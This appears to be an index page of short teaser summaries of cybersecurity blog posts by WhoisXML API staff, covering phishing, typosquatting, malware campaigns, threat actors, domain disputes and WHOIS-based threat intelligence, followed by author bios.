Experts often say every cyber threat intelligence team needs a threat intelligence platform, but what is it really and how do you choose the best one for your company? Andreas Sfakianakis, in his recent SANS Institute CTI Summit 2021 talk titled "Excelling at Threat Intelligence Platform Requirements," inspired us to take a deeper look. more
Ramnit stands out among malware as it continues to evolve and requires cybersecurity experts and law enforcement agents to stay alert. Variants have recently been detected, so security companies such as Prevailion advise organizations to keep Ramnit on their radar. more
In a recent study, INKY examined around 657 million emails sent in 2020 and found almost 5 million phishing campaigns, more than 590,000 of which were brand impersonations. It then came up with a list of the top 25 most phished brands in a 2021 report. more
As early as December of last year, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) received reports of several cyber attacks targeting K-12 distance learning institutions. more
A few weeks back, we added unpublicized artifacts to the list of indicators of compromise (IoCs) published by both FireEye and Open Source Context back in December 2020. Some would have thought that would put a stop to the havoc the SolarWinds threat actors have been wreaking, but the group targeted Malwarebytes just recently according to a company report. more
A couple of weeks back, a security researcher alerted his LinkedIn contacts about possibly ongoing targeted attacks stemming from the Iranian subnet 194[.]147[.]140[.]x. He advised cybersecurity specialists to watch out for subnets that may pose a threat and consider blocking them. This post encouraged us to look into the subnets, and our findings, obtained using the IP Netblocks WHOIS Database, are detailed here. more
An enterprise's domain portfolio continues to change as it offers new products and services or withdraws old ones. Mergers, acquisitions, and buyouts also affect its domain portfolio. Constant monitoring of one's domain portfolio and its related infrastructure is crucial in today's cybersecurity landscape. more
Know-your-customer (KYC) policies aim to minimize the risk of money laundering, bribery, and other types of fraud. While they were originally implemented in financial institutions, companies outside the financial sector have adopted KYC, with digital transactions as the primary driver. These days, the approach is enforced by virtual asset dealers, nonprofit organizations, and even social media companies. more
The U.S. Capitol riot on 6 January 2021 was an unexpected event following the 2020 U.S. elections. The incident also made headlines worldwide, prompting us to track the registration trend for Trump-related domains and subdomains. We also looked into two domains for Trump's e-commerce stores that Shopify shut down. more
Blind Eagle is a South American threat actor group believed to be behind APT-C-36 that has been active since at least 2018. It primarily targets Colombian government institutions and large corporations in the financial, petroleum, and professional manufacturing industries. more
The SolarWinds hack affected several government agencies and tech companies in the U.S. and worldwide. The sophisticated malware attack is believed to have compromised the trusted IT management software as early as March 2020 but only came to light in December. more
Intrusion detection systems (IDSs) and intrusion prevention systems (IPSs), collectively called "intrusion detection and prevention systems (IDPSs)," monitor network traffic to stave off unauthorized access. Roughly speaking, an IDS detects possible malicious network activities, while an IPS stops malicious traffic from entering and possibly damaging a network. more
Why go after individuals when you can get greater rewards by zooming in on more lucrative targets like large multinational corporations (MNCs)? That's the premise behind the Cosmic Lynx business email compromise (BEC) campaign that brought several MNCs, many of which were Fortune 500 or Global 2000 companies, to their knees. more
In October, Brian Krebs reported that several websites related to 8Chan and QAnon went offline, albeit only briefly. That happened when the entity protecting them from distributed denial-of-service (DDoS) attacks, CNServers LLC, terminated its service to hundreds of Spartan Host IP addresses... more
More recently, phishers used a Financial Industry Regulatory Authority (FINRA) look-alike domain in an attempt to breach several of its members' networks. FINRA is tasked with overseeing 624,000 brokers in the U.S., so attacking its clientele could yield a hefty sum should phishing email recipients fall for the ruse. more
Charming Kitten is a cybercriminal group believed to be of Iranian origin. It was first seen in 2014 and remained active for years after the initial detection. The group uses an intricate web of methods such as spear phishing and impersonation. more
Cyber espionage is a type of cyber attack that aims to steal sensitive and often classified information to gain an advantage over a company or government. The 2020 Data Breach Investigations Report (DBIR) revealed that several hundred incidents across industries in the previous year were motivated by espionage. more
Targeted attacks are known as some of the most destructive cyber attacks in that they zoom in on organizations that either provide critical services or have massive user bases. more
Not all of the domains that contain a company's brand are under its control. A portion of them -- sometimes even the vast majority -- is typically registered by unidentifiable third parties with masked WHOIS records. Arguably, WHOIS redaction might also be preferred by the companies themselves for privacy purposes. But to what extent is this the case? more
The Tor Project has been synonymous with the Deep Web, as it is a primary method by which users can access hidden portions of the Internet. Besides traffic encryption, an additional feature that gives Tor users anonymity is that their network traffic passes through several nodes, making the real source unidentifiable. more
Microsoft is among the most imitated brands globally. Running the company's popular product and service names, such as LinkedIn, Office365, and Windows, through a subdomain lookup tool, we uncovered 7,900 related subdomains. more
Elections and other events related to the government typically drive a great amount of Internet activity. Considering the domain name space, we found 4,197 subdomains related to the U.S. elections and the government in general. more
The attack surface of every Internet user gets wider every day, but it doesn't mean there's nothing that can be done about it. For one, analyzing possible attack vectors, such as suspicious or malicious domain names and IP addresses, can help with attack surface management. more
Cybercrime is first and foremost financially motivated. Cybercriminals look for lucrative targets, including social media networks with hundreds of millions of monthly active users. We put this perspective to the test by analyzing the domain attack surface of three of today's largest social media platforms. more
Just as no man is an island, no company can perform core functions without other organizations' help. This fact is highlighted in today's age of outsourcing, partnership, and third-party connections. Unfortunately, threat actors have also found a massive opportunity in these relationships. more
Almost every transaction on the Internet is riddled with risks, and the use of online payment processing platforms is no exception. With more people opting to transact online and use digital wallets, threat actors have much to gain by targeting online payment processing platforms. more
Every organization faces two kinds of cyber threats daily - "known" and "unknown" ones. Known threats are those that security experts have discovered, often published in blogs and major news outfits with accompanying indicators of compromise (IoCs). Unknown threats, meanwhile, are those that remain hidden to victims and researchers. IoCs for these have yet to be identified and disclosed. more
Most businesses rely on third-party entities to outsource certain functions, save on costs, and strengthen their cybersecurity capabilities. While working with external providers makes perfect business sense, it also poses cyber risks. more
Threat actors usually ride on a brand's popularity to make phishing campaigns believable. A common approach involves registering typosquatting domains that closely resemble those of the legitimate owners. Yet monitoring typosquatting domains may just be the tip of the iceberg in the fight against phishing. more
Phishing attacks' success can be partially attributed to threat actors' use of branded domain names, including both legitimate and misspelled variants. It's no wonder, therefore, that blacklisting sites like PhishTank provide users a way to search phishing URLs by target brand. more
Virtual private networks (VPNs) are widespread; about a third of the Internet population uses them worldwide. Their primary reason? VPN usage touts more secure browsing. more
Dridex, Trickbot, and Emotet are banking Trojans that have enabled cybercrime groups to steal hundreds of millions of dollars from their victims. These malware families have evolved over the years, and just recently, Emotet was seen using stolen attachments to make its spam emails more credible. more
The world continues to produce and consume digital content at an increasingly fast pace across channels - making risk exposure continuously greater in the process. To tackle this problem, digital risk protection allows organizations to address digital risk factors and monitor and reduce their attack surface. more
Threat actors are seasoned posers. They often pose as bank employees, police officers, or court officials. A coronavirus-themed campaign even had them posing as the Director-General of the World Health Organization (WHO). Insurance companies are also increasingly targeted, which can be attributed to the ongoing global health crisis. more
In 2018, the biggest scam that banked on the Black Lives Matter movement was exposed. An Australian National Union Workers official named Ian Mackay was allegedly behind the Black Lives Matter Facebook page that garnered more than 700,000 followers and racked up over US$100,000 in donations. more
Disposable email addresses are quite widespread and for different reasons. Some people believe that using throwaway or temporary email addresses helps them protect their privacy. Others, however, use these in more questionable endeavors - hence the relevance of monitoring disposable email domains. more
A domain generation algorithm (DGA) is used to generate several domain names commonly used for command-and-control (C&C) servers in malware attacks. The logic behind a domain generation algorithm is quite simple. Instead of hard-coding the domain or IP address into the malware, the malware finds its C&C under a domain with a seemingly random name. more
Threat actors are always on the lookout for potential ways into target networks. And although the cybersecurity world has a lot on its radar already, subdomains are entry points that are not always easy to identify and may end up overlooked. more
Cyber attacks can come from practically any angle, and more often than not, it's hard to see them coming without knowing all there is to know about a domain's WHOIS history and connected domain entities. Several aspects come into play in this scenario, one of which is old and forgotten pages on a website. more
People may not yet be keen on going to movie theaters due to COVID-19. As such, drive-in movie theaters have become more prominent as these help implement social distancing measures. more
Kanye West trended after he announced his plan to run for U.S. president on 4 July 2020. On Twitter, his announcement was liked over 1.1 million times and retweeted more than 500,000 times. Elon Musk was also quick to express his support. more
Captain America arrived on Fortnite in time for the 4th of July celebration. This announcement was big news to the gaming community, with search terms such as "fortnite captain america skin" and "fortnite captain america" significantly rising in popularity on Google in the past week. more
The U.S. Independence Day comes with both fireworks and the best deals. On this holiday, retailers usually offer big discounts. At this time when people may opt to shop online, several publications like TechRadar and Business Insider even curated a list of 4th of July deals from different retailers. more
A bulk whois lookup of domain names similar to the official website of the Florida Statewide Medicaid Managed Care (SMMC) Program -- www[.]flmedicaidmanagedcare[.]com -- indicates that a typosquatting event, or a cybersquatting one at the very least, might be at play. more
Even as the world continues to tackle the coronavirus pandemic, essential events just can't be delayed. The U.S. presidential elections will continue to take place on 3 November 2020. more
George Floyd passing away while being arrested in Minneapolis, Minnesota, sparked several Black Lives Matter (BLM) protests worldwide. The protests started on 26 May, a day after Floyd's death, spanning states and even countries within a few days. more
Back in 2018, investigative journalist Brian Krebs warned against the nuances of internationalized domain names (IDNs). These domains, which contain non-Latin characters that look like Latin ones, can be used to create visual confusion that can become particularly handy in executing credible punycode phishing campaigns. more
Microsoft is among the top technology companies globally and so is in critical need of brand protection. The company's name has already figured in many phishing campaigns; Microsoft Office 365, for instance, has been abused several times in business email compromise (BEC) scams. more
Typosquatting is among the cybersecurity threats that deserve a closer look in the financial sector. In fact, the early detection of typosquatting domains can help financial institutions maneuver away from cyber risks that could cause much damage. But to what extent is this the case? more
PayPal is still one of the most imitated brands on the Internet. From 1-8 June 2020, the Typosquatting Data Feed detected a total of 64 PayPal lookalike domains. more
On 29 April 2020, IBM X-Force warned users of an AppleID typosquatting campaign specifically targeting members of the media sector. We sought to dig deeper into these threats and find other relevant domains and IP addresses that users, regardless of industry, may need to steer clear of. more
On Instagram's Help Center, there are sections solely dedicated to Intellectual Property. The social media giant also provided avenues for reporting account impersonation and trademark violations. more
In 2019, Credit Suisse was hit by a spying scandal that quickly spiraled into several things - a public confrontation, a resignation, and a death. Iqbal Khan, the bank's former head of wealth management, confronted a private investigator on the streets on 17 September after noticing that someone was following him. more
Cybercrime is borderless. Just like marketing teams use location-based targeting to create a deeper connection with customers through content personalization, cybercriminals adjust their attacks to exploit their victims' fears. more
Analysts and researchers have advised users to be wary of newly registered domains (NRDs) for several years. Back in 2019, it was even suggested that 70% of new domain registrations are malicious. We keep identifying many suspicious newly registered domains in our Newly Registered & Just Expired Domains database even today, many of which are related to current world events such as the spread of COVID-19. more
Amid the spread of COVID-19, the world continues to suffer dire health and economic consequences. To help, national governments have released funds to support companies and laid-off employees. more
As the coronavirus infection toll continues to rise, many countries are scrambling to get their hands on medical-grade N95 face masks. A commodity that once only served a purpose in specialized sectors such as healthcare has become a premium product demanded by the public. more
COVID-19 caught everyone by surprise. No one thought a virus could inflict so much damage to the global economy, but it has. As thousands of businesses closed shop and millions of employees lost their jobs, governments and international organizations alike sought to provide financial assistance to the severely affected. more
The rapid spread of COVID-19 had people scrambling to protect themselves. Among different means of protection, besides imposed community quarantines and social-distancing measures, it has been widely recommended to purchase reliable surgical masks and respirators. Mass demand for such products quickly led to a shortage in different parts of the world. more
As a huge chunk of the world's population is staying at home because of social distancing measures, video-conferencing businesses saw an opportunity to expand their freemium offers. more
A lot of thinking and energy often goes into finding the "best" Internet domain name for a new brand, product, or service. So, isn't it wonderful when the perfect match turns out to be available right away for purchase with any big registrar? more
Cybercriminals know no boundaries. While the world battles the COVID-19 pandemic, threat actors continue to attack businesses that may already be suffering from operational setbacks. more
Spear-phishing email attacks pose a significant challenge to most organizations. A successful attempt can cost a company an average of US$1.6 million per incident. more
Targeted attacks are considered insidious digital threats as they may lead to debilitating data breaches with substantial financial repercussions. Apart from money lost to theft, victims may shed even more resources as they face expensive lawsuits, hefty fines, and settlements for failing to comply with data privacy regulations in addition to reputational damage. more
Having crossed the two-million mark in coronavirus infections worldwide, citizens from all nations are facing a difficult time. Sadly, cyber threats and attacks currently spreading online are making the situation worse. more
The world has been on edge for the past weeks as many nations enforced mass quarantines amid the continued rise in the number of Coronavirus-infected patients. As a result, about a third of the global population is staying at home to avoid further spread of the virus, and people have been relying on online channels to stay updated. more
If you sometimes lose your temper because a website isn't loading fast enough, you're not alone. Slow websites are not only annoying; the consequences for website owners can also be far-reaching. more
The Domain Name System (DNS) is a crucial element of the Internet and a foundation of networking. Every organization going online uses the DNS. more
As stewards of the Web, Internet infrastructure providers are often held accountable for ensuring the safety of users. Sadly, the recent spate of high-profile security incidents shows that this is not an easy task. more
As cyber-attacks become more robust and sophisticated every day, the world of cybersecurity saw the need to shift. Hence, cyber resilience became the new norm. Cyber resilience bases itself on the fact that cyber risks are no longer just IT risks but also business risks. more
Since time immemorial, entertainment companies have always had to contend with content theft. Bootleggers are nothing new in the industry, and their ways have evolved much along with technology. more
Thousands of trademark infringement cases get heard every year -- some of which are more unexpected than others. For instance, let's take a look at one that originates in the world of fiction. Like SpongeBob himself and Patrick, the Krusty Krab has been a centerpiece in the "SpongeBob SquarePants" cartoon series and movies. more
The business world has seemingly divided views on content filtering. Some say that the tactic is too restrictive, while others opine that it can help in a lot of ways. Building on the latter perspective, in an age when the Internet has become a breeding ground for almost anything. more
Melissa, what many consider to be the first malspam campaign, emerged in 1999. Once successfully installed, the "mass-mailing" virus forwarded copies of itself to the first 50 email addresses on a victim's contact list. While the malware wasn't as dangerous as current variants, it could still effectively max out network resources, resulting in downtime. more
Fighting cybercrime is a never-ending battle. As threat actors continue to craft different ways to attack and scam their target victims, companies need to build their security arsenals to fight against all kinds of threats. What's more, an effective way to achieve cyber resilience is by getting to know the enemy and building attack profiles. more
Typosquatting is a malicious tactic that cyberattackers employ to entrap users who mistype web addresses on their browsers. Often, mistyped domain addresses redirect to copycats of legitimate sites and are owned by threat actors. more
Cyber attacks can hit any organization and even derail its operations on a grand scale. Just recently, ISS World, a facility management service provider with clients in more than 70 countries worldwide, released a statement in which it mentions being the victim of a malware attack. more
The Telephone Consumer Protection Act (TCPA) is a federal statute that restricts telemarketers from making automated and unsolicited calls as well as sending faxes and messages to people. Affected individuals may choose to file a complaint and collect a minimum of US$500 for each illegal communication received. more
Phishing attacks continue to show an upward trend. Over the years, phishers have improved their methods, using very convincing domains to bait victims into their schemes. more
Most businesses know the importance of protecting a brand. But, only a few of them understand that protecting their online properties is just as central to their brand-protection strategies. more
Presumptive conclusion or inference suggests that a piece of evidence is authentic based on other facts recognized by the law. When law enforcement and cybersecurity researchers investigate cases, they come across strong evidence that may be insufficient on their own to implicate a victim or move a case forward. more
Phishing keeps making much noise in the realm of cybersecurity, and not in a good way. A majority of cyber attacks start with a phishing email, making the tactic responsible, at least partially, for close to 90% of data breaches. more
IP spoofing is a cyberattack technique that entails using a device or a network to fool users into thinking the attacker is part of a legitimate entity. Often, cybercriminals use this method to access computers in a target network to obtain sensitive information, turn systems into zombies, or launch a denial-of-service (DoS) attack. more
The more popular a brand is, the more customers buy its products. That same popularity makes it a lucrative target for infringers to sell counterfeits. As such, it has become a must for global brands to use brand protection software to make sure their reputation and consumers do not suffer. more
Gone are the days when a single department in an organization shouldered the responsibility for a company's brand protection strategy. A research paper that discussed the future of online brand protection shows that inter-department involvement, starting with the board's approval and support, down to the implementation of the strategy by different departments, is required. more
Typosquatting is also known as "URL hijacking," and for good reason. Just as hijackers unlawfully seize a vehicle, typosquatters take over a domain name and use it for malicious activities. more
Reverse domain name hijacking (RDNH) can be considered a severe threat to any honest-to-goodness small business or your average website owner. more
One of the first go-to resources for law enforcers and cybercrime investigators is the WHOIS database. WHOIS domain search tools such as WHOIS Lookup provide rich information about a particular domain name or IP address. more
When visitors fail to recognize that the site they visit is a fraudulent copy of that of a famous brand, they can expose themselves to cybercrime and other attacks. As part of these attacks, typosquatting is a common technique that hackers use to lure victims. They create websites that very closely resemble that of the brand they are trying to hijack so the victims would not have a clue that it is fake. more
Over the past five years, the Internet has seen the mass migration of websites from HyperText Transfer Protocol (HTTP) to its extension, HTTP Secure (HTTPS). HTTPS is a communication protocol that encrypts the data exchanged between sites and user agents. more
Sometimes, seeing several permutations of a famous company's domain names is not just a mere coincidence. Often, these are typosquatting attempts. They are not merely a nuisance, either, because clicking such a URL can have severe effects. more
Do organizations need to worry about domain look-alikes? The answer is, unfortunately, yes. Threat actors often impersonate popular brands and domains to lure users into visiting malicious pages and divulging their personally identifiable information (PII). more
In a Uniform Domain-Name Dispute-Resolution Policy (UDRP) case, the complainant usually has to prove three elements to win. Failing to satisfy these evidentiary requirements can not only render the case null and void but may also lead the panel to consider it an instance of reverse domain name hijacking (RDNH). more
While other organizations also hear Uniform Domain Name Dispute Resolution Policy (UDRP) cases, the World Intellectual Property Organization (WIPO) is the largest. more
The holidays are a bustling time for businesses and, unfortunately, fraudsters too. Travel fraud is rife in the lead-up to the festivities, with airline ticket scams taking center stage. According to a report by The Street, airlines lose US$2.4–4.8 billion yearly due to false bookings. Consumers, meanwhile, lose US$283–588 per transaction. more
Cybersquatting is likely one of the oldest digital threats out there, but somehow, it still works. The first cybersquatting case filed after the implementation of the Uniform Domain Name Dispute Resolution Policy (UDRP) involved the domain worldwrestlingfederation[.]com. more
Moving more workloads to the cloud has become a top priority for enterprises. Some 96% of organizations are, in fact, already using cloud computing in one or more areas of their business. Cloud computing benefits enterprises in many ways, but perhaps the driving force behind the increased cloud adoption is this: Organizations that use cloud services grow faster. more
The World Intellectual Property Organization (WIPO) recorded a 12% increase in Uniform Domain-Name Dispute Resolution Policy (UDRP) cases filed in 2018. In fact, WIPO saw a total of 3,447 cases that covered 5,655 domain names. What this implies... more
The legal sector has become a favored target of phishing campaigns. 80% of law firms reportedly received phishing emails in 2018. And in 2017, the success of these phishing campaigns was 300% higher than in 2016. more
Deciding on a domain name is both an exciting and challenging task that every website owner must undertake. A good domain name must sound interesting and be easy to remember while echoing the nature of the business. more
At the most basic level, the Internet consists of interconnected networks that communicate using standard protocols such as the Border Gateway Protocol (BGP) and the Domain Name System (DNS). As such, it is built on trust or an honor system – trust that routing requests received from another network are valid, and the traffic sent in response to requests is legitimate. more
Early this month, the Gekko Group, an AccorHotels subsidiary, erroneously uploaded more than 1TB of confidential information to a publicly accessible cloud-based server. This error led to the exposure of tons of data owned by its partner hotels' clients, travel agencies, and customers. more
An attempted ransomware attack on some Louisiana state servers caused the state's cybersecurity team to shut down their IT systems and websites. Governor John Bel Edwards, however, emphasized that not all of the state's servers were affected. more
On November 11, news about the massive data exposure of the clients of Orvis, a 163-year-old retailer, made headlines. Some of the company's login credentials were posted online... With over 80 retail stores, 10 outlets, and hundreds of independent dealers worldwide, we believe potential attackers could get their hands on the data of millions of customers. more
Cybersquatters can pose severe risks for brands, so it's good news when a company wins against them. Home Box Office, Inc. (HBO) recently won its case in a domain dispute for TrueDetective.com. The titular show has a huge cult following, which explains why someone may want to leverage a domain name around it. more
Earlier this week, a new variant of MegaCortex ransomware was found encrypting files and changing victims' passwords on Windows-based computers. Victims who failed to pay the ransom were, as usual, threatened that their personal data would be released. How does the attack work? more
On 16 October, Web.com – the world's oldest domain name provider and owner of Network Solutions, NameSecure, and Register.com – disclosed a major breach resulting in the leakage of its customers' personally identifiable information (PII). more
In a world where society is driven by information, data science has gained solid ground over the past years for its ability to separate the wheat from the chaff. Its predictive power is now being explored in the context of cybersecurity. After all, efficient threat protection requires gathering and interpreting the enormous amounts of traffic generated to and from one's network. more
Security orchestration, automation, and response (SOAR) and security information and event management (SIEM) tools share several components and so most security operations teams use the terms interchangeably. more
Technology, through its immense evolution, has now become a significant driver of the economy – both digital and global. Along with developments and innovations such as cloud-based computing and Internet-connected mobile devices, however, cybercrime lurks in the shadows. more
For several years, digital security relied on a simple strategy – gain insight from past events, learn from them, and base security protection accordingly. more
One of the main struggles of organizations is streamlining processes through cost-effective means. This problem is adequately addressed by DevOps, a set of processes that aims to unify development and operations. more
The traditional notion of the security perimeter is growing increasingly problematic in the wake of highly publicized attacks. The perimeter is becoming nonexistent, as cloud-based infrastructures replace legacy systems. more
While it's true that the lines between cybersecurity roles have become blurred, some have more significant barriers to entry. The field of digital forensics and incident response (DFIR), in particular, is an altogether different beast. more
Achieving an ideal organizational network means seamless development, operations, and security. Knowing and achieving that, however, is a great challenge. more
Mitigation and remediation are two words thrown around a lot in cybersecurity, often interchangeably. While there exists a stark contrast between one and the other, both play a crucial role in security service providers' risk-related decisions. more
Emerging malicious threats are driving the demand for new cybersecurity experts. The rise of ransomware and machine learning (ML)-driven attacks underscores the importance of having the capability to track and prepare to combat such threats. In response, the profession had to adapt quickly by employing staff with the necessary offensive and defensive skills. more
News of a South African ISP's two-day outage sent the industry abuzz last month, highlighting the need for improved distributed denial-of-service (DDoS) attack mitigation. more
In an ideal world, administrators should never run across threats to their web properties. However, human errors and vulnerabilities inevitably get in the way of cybersafety. Managed Domain Name System (DNS) providers, registrars, and services can sometimes put users at immense risk as well. more
The current security landscape calls for intensive monitoring and analysis to effectively identify possible threats to applications, systems, and infrastructure. With millions of threats discovered monthly, security experts must revamp and update their cybersecurity measures and tools. more
Organizations in the cybersecurity industry must make crucial decisions to ensure they do the job right. One of these decisions includes whether to use blacklisting or whitelisting. more
Copyright infringement laws have become less effective due to the ease of sharing content over the Web. Music streaming services, for example, have increased music consumption and overall industry revenue, but they have also reduced album sales and song downloads. more
Imagine that your registrar informs you the domain you've been eyeing would soon become available for purchase. That's good news. However, your security adviser told you to make sure a domain is threat-free before you buy it. more
If we're to sum up what any domain owner would want to avoid, it would be ending up in anyone's blacklist. Domain blacklisting has detrimental consequences for any business. Actually, it can have the same or similar negative brand effects as you'd see in the aftermath of a data breach or PR incident. more
The Domain Name System (DNS) plays an essential role in resolving IP addresses and hostnames. For organizations, it ensures that users reach the proper sites, servers, and applications. While it's a fundamental base for a functioning Web, the problem is that this system can easily be abused. more
Reverse domain name hijacking is a shady practice that some individuals and organizations carry out. It occurs when a trademark owner makes false claims in an attempt to gain control of a domain that someone else owns. more
Experts in the realm of cybersecurity are continually trying to keep up with the changes in the threat landscape. Even with advanced tools on hand, any IT security professional knows that a data breach can happen at any time. more
Each day, threat actors search for targets whose assets they can compromise for personal gain. Their attacks often use exploit kits that find gaps in networks, which they then use to infiltrate and compromise vulnerable systems and applications. more
Cybercriminals aren't always as creative as we think they are. There is a myth about them having a never-ending supply of techniques and tricks up their sleeves. However, many can't be considered as innovators in their shady field. more
The problem of credit card fraud is not set to be resolved anytime soon. On the one hand, detecting and preventing the artifice is one of the most challenging aspects of e-commerce. more
If there's anything we learned about the threat landscape, it's that none of us are safe from malicious actors. Becoming a victim is not a matter of "if" but "when." Enterprises are now aware that the thought of being "too big to fail" is no longer applicable. more
One of the most effective and prevalent ways to reach someone in today's business world remains email. With billions of users worldwide, it is the backbone of business communications. more
There's no denying the fact that many enterprises worldwide use security information and event management (SIEM) software. These products collect, analyze, and create reports on cybersecurity data from the range of systems an organization uses. Some SIEM programs are even capable of stopping attacks in progress as soon as these are detected. more
Outsourcing may not always have had the best connotation. In the context of cybersecurity, however, the activity is a vital one and often even the only real alternative for many small- and medium-sized organizations. more
Fighting off individual threats is challenging enough, but things get complicated, and the results more damaging when organizations face blended threats. The practice of combining security threats such as malware and attack vectors confounds if not overwhelms victims, making them easy prey. more
Although the Internet offers many opportunities, it also comes with a wide variety of issues. Cybercrime is rampant, and not knowing how to navigate the Web safely can lead to severe consequences. Phishing is one of the top concerns for enterprises. And managed security service providers (MSSPs) have decided that URL filtering is one way to resolve the issue. more
Cyber attacks and hacking methodologies are growing in complexity over time. This concern has led many enterprises to look toward more advanced capabilities to enhance their cybersecurity. One solution they have found is utilizing next-generation firewalls. more
The threat landscape is more complicated than it was before. Many organizations are thus starting to weigh their options on how to protect their data best. Amid the persistent cybersecurity skills shortage, companies are wondering if they should turn to outsourced services. more
Detecting and preventing fraud have become increasingly in demand over the years. As such, expectations from fraud solution providers have gone up as well. more
A recent prediction from Cybersecurity Ventures states that the cybersecurity sector is going to have as many as 3.5 million unfilled positions by the year 2021. That is why managed detection and response (MDR) services are now more important than ever. more
Many domain names are registered each day and so become part of the Domain Name System (DNS). In fact, research shows that at least two new registrations are seen per second. Although most of these are done for commercial and other legitimate purposes, not everyone who registers a domain has good intentions. more
Organizations operating a security information and event management (SIEM) solution are struggling with one of the biggest problems in cybersecurity today: false positives. more
Has the world moved on from email marketing? Some might think that email has become nearly obsolete with the rise of social media channels and all the buzz about virtual reality, machine learning, and chatbots. more
In this article, let's take a look at several use cases for the API and talk about why you should start employing it today. more
Threat intelligence is the cornerstone of a mature cybersecurity plan. Staying abreast of the emerging threats and knowing where and when your adversaries are about to strike is a crucial aspect in building organizational cyber defenses. more
Let's start this post on WHOIS database download services with a story. Meet James, a businessman who has just taken an important step in developing the digital presence for his small business by registering a domain name. more
Data, due to increased accessibility and interconnection, has been making the World Wide Web go round. Without your log-in credentials, you can't check your email, see what your friends and family are up to on social media, listen to music or watch movies and your favorite shows on streaming services, book a ride, shop for groceries, or do online transactions. more
The future continues to look bleak as the total amount lost to cybercrime is expected to keep growing. It will, in addition, put incentives for innovation and investment at risk, making cybercrime more profitable than ever. more
Everything important in business needs to be adequately maintained for effective long-term operations. This includes relationships with customers, employees, and partners as well as IT systems and equipment. more
The web has made the world a smaller place by reducing the relevance of location. How so? Anyone, no matter where they are, can now reach out to anyone else with useful information ranging from breaking news events to commercial proposals. more
What keeps CISOs up at night? For hundreds of senior company leaders across countries and industries, the steady growth of cybercrime is one of their biggest concerns. Consequently, organizations spend more money than ever to mitigate the risks and consequences of data breaches, despite a new wave of attacks being on its way as we speak. more
This quote from The Art of War could not be more relevant when we think of today's digital battlefield: "If you know the enemy and know yourself, you need not fear the result of a hundred battles." more
Anyone interested in starting to do business online should have a few essential things ready before rushing in, including a memorable name and a potentially profitable business model. more
Journalists, brand specialists, cybersecurity researchers... Everyone wants answers on who does what online, so where can you get the clues you seek? WHOIS data, alongside its databases and related products, can help you find out who's behind the most notorious websites - and possibly the shadiest ones as well. more
All entrepreneurs typically have a single goal in mind - ensuring their company's success - and that means reaching and getting as many customers as possible. Nowadays, that translates to taking advantage of the data that GPS-enabled devices provide. more
Just when we thought that phishing had run out of its bag of tricks, hackers are changing their tactics. Whereas before the attacks could be generalized and random, this time, they are more targeted, tailored, and personal. What are crooks up to? more
Maintaining an online presence isn't as simple as choosing a name, putting it up, and waiting until things turn out well. Once you're out there, you have to keep an eye on your domain and what's happening around it, because not doing so could put you at a disadvantage or even in danger. more
Cybersecurity is pretty much a game of "hide and seek" - cybercriminals hide, cybersecurity teams seek - and the damage is often based on how long the perpetrators are able to continue their attacks without being found. more
The Internet is like a beach - you will most likely leave behind footprints while you are there. And these impressions can be traced back to whoever left them. The same is true with domain ownership. That website name you plan to launch your next venture on? Its domain may have a history of its own. more
A while back, creating malicious software was sort of a hobby for programmers. It was hardly ever used to make money, but more of a way to show off what one can do with a computer. more
As scary as it may seem, everyone is a target on the Web. Worse, your susceptibility to cyber attacks, when not promptly addressed, marks you not just as a target but can even lead others to consider you as a threat. more
Who are the entities behind the domains on the Web? This question has nothing to do with stalking but is critical for various business activities. Domainers, for instance, want this information to negotiate lucrative purchases while journalists might need it to set up interviews or get leads during investigations. more
Do you know where your online customers are? Can you tell whether the right users in your network are all authorized to access its content? Are you able to detect and block suspicious traffic and devices? more
Like it or not, the face of cybersecurity has changed over the past few years, and while the conventional approach has taken a back seat lately, non-traditional methods are coming to the rescue. more
A career as an information security analyst is one of the top technology jobs nowadays, and for good reason. Billions of dollars are spent every year to fight cybercrime, and companies are now willing to pay top rates for the best talent available. more
The world of marketing and media isn't a walk in the park. The teams working in those departments are always on the move, continually looking for ways to improve their strategies. A WHOIS database can prove useful for them in many ways. Read on to find out how. more
Jonathan Zhang
Founder and CEO of WhoisXMLAPI & ThreatIntelligencePlatform.com. Joined on Feb 28, 2019
Alexandre Francois
Head of Marketing & Security Researcher at WhoisXML API. Joined on Feb 28, 2019
Alex Ronquillo
Sr. Director of Business Development at WhoisXML API. Joined on Feb 28, 2019